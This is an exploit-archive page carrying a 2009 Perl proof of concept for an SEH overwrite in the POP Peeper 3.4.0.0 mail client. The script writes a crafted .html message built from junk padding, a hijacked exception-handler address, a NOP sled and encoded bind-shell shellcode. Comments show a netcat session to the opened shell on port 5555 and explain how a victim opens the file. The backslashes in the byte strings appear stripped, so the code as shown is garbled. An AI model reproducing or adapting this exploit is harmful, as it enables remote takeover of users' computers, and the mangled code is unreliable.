[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit
# Published : 2009-03-23
# Author : Stack
# Previous Title : POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit
# Next Title : CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit
# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit
# Exploit By Stack
# Mountassif Moad
# How to use : file > Open message or Ctrl + O
# Select The .html file ......>>
# Connect With 5555 Port
# C:nc>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-a4eeb2267
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:Program FilesPOP Peeper>
# Boom Box Connected :d
# Thnx Simo- SOft - Jadi - Str0ke
# usage perl xpl.pl >>stack.html
my $mp=
################
"x46x52x4Fx4Dx3Ax20". # First Header
################
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41". # Start Junk
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41". # End Junk
################
"xebx06x90x90". # Next_Seh
"x4cx51x01x10". # SEh ( Universal )
################
"x90x90x90x90x90x90x90x90". # Start Nop
"x90x90x90x90x90x90x90x90x90x90x90x90". # End Nop
################
# Start Scode
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e".
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38".
"x4ex36x46x42x46x42x4bx38x45x54x4ex43x4bx58x4ex57".
"x45x30x4ax37x41x50x4fx4ex4bx58x4fx34x4ax41x4bx58".
"x4fx35x42x52x41x30x4bx4ex49x54x4bx38x46x43x4bx38".
"x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x4ax32x45x57x45x4ex4bx38".
"x4fx35x46x52x41x30x4bx4ex48x56x4bx38x4ex50x4bx54".
"x4bx48x4fx45x4ex51x41x30x4bx4ex43x50x4ex32x4bx38".
"x49x58x4ex36x46x52x4ex51x41x56x43x4cx41x53x4bx4d".
"x46x36x4bx38x43x34x42x43x4bx48x42x44x4ex30x4bx48".
"x42x47x4ex51x4dx4ax4bx48x42x44x4ax30x50x35x4ax36".
"x50x58x50x34x50x30x4ex4ex42x35x4fx4fx48x4dx48x46".
"x43x45x48x36x4ax36x43x33x44x33x4ax46x47x57x43x57".
"x44x53x4fx45x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e".
"x4ex4fx4bx53x42x35x4fx4fx48x4dx4fx35x49x38x45x4e".
"x48x56x41x58x4dx4ex4ax30x44x30x45x55x4cx56x44x30".
"x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x35".
"x4fx4fx48x4dx43x45x43x45x43x45x43x55x43x55x43x44".
"x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax46x45x31".
"x43x4bx48x56x43x35x49x38x41x4ex45x49x4ax36x46x4a".
"x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx56x42x41".
"x41x55x45x45x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32".
"x49x4ex47x45x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d".
"x4ax56x45x4ex49x54x48x48x49x44x47x35x4fx4fx48x4d".
"x42x45x46x35x46x55x45x55x4fx4fx42x4dx43x49x4ax46".
"x47x4ex49x37x48x4cx49x57x47x55x4fx4fx48x4dx45x55".
"x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax36x43x56".
"x4dx36x49x38x45x4ex4cx56x42x45x49x55x49x32x4ex4c".
"x49x48x47x4ex4cx36x46x44x49x58x44x4ex41x43x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x44x4ex32".
"x43x39x4dx48x4cx37x4ax53x4bx4ax4bx4ax4bx4ax4ax56".
"x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f".
"x48x4dx4bx45x47x55x44x55x41x55x41x45x41x55x4cx46".
"x41x50x41x45x41x35x45x45x41x35x4fx4fx42x4dx4ax56".
"x4dx4ax49x4dx45x50x50x4cx43x35x4fx4fx48x4dx4cx56".
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x35x4ex4f".
"x43x48x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d".
"x4ax36x42x4fx4cx38x46x30x4fx45x43x55x4fx4fx48x4d".
"x4fx4fx42x4dx5a".
# End Scode
################
"x0Dx54x4Fx3Ax20x53x74x61x63x6Bx20x3Ax64x20". # Second Header
"x0Dx0D";
################
print $mp;
# www.Syue.com [2009-03-23]